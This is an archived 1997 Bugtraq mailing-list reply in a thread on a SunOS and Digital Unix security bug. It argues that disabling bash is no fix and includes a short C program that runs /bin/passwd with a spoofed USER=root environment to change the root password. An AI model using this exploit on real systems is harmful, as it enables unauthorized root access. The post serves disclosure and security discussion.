Bugtraq mailing list archives

Re: SunOS exploit. & DigitalUnix

From: jzbiciak () DALDD SC TI COM (Joe Zbiciak)
Date: Tue, 20 May 1997 08:00:37 -0500


'Martin Mokrejs' said previously:
|
| This also works on Digital Unix 4.0B :-(
|
| login as generic user, than run bash,

[...]

| I succesfully modified root's password :-( Even we have C2 security
| installed :-(
|
| I suggest - disable bash !!!

Wrong answer!

If bash can do it, then ANY user-level process can do it.

Here's a program I whipped together in under a minute.  If I can do that
in a minute, what's disabling bash going to do?

main () {
        char * argv[] = { "passwd", "root", 0 };
        char * envp[] = { "USER=root", 0 };

        execve("/bin/passwd",argv,envp);
}

--Joe

--
 +--------------Joseph Zbiciak--------------+
 |- - - - jzbiciak () daldd sc ti com - - - - -|
 | - - http://ee1.bradley.edu/~im14u2c/ - - |      Not your average "Joe."
 |- - - - Texas Instruments,  Dallas - - - -|
 +-------#include <std_disclaimer.h>--------+

Current thread:

Re: SunOS exploit., (continued)
- Re: SunOS exploit. Trevor Linton (May 18)
  - /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Dixon Ly (May 19)
    - Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Fabrice Planchon (May 20)
    - Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc Walter Hafner (May 21)
    - write(1) test (May 21)
    - Re: write(1) Jauder Ho (May 22)
    - Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Mike Scher (May 21)
    - Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Doug Hughes (May 22)
  - Re: SunOS exploit. Casper Dik (May 20)
  - Re: SunOS exploit. & DigitalUnix Martin Mokrejs (May 20)
    - Re: SunOS exploit. & DigitalUnix Joe Zbiciak (May 20)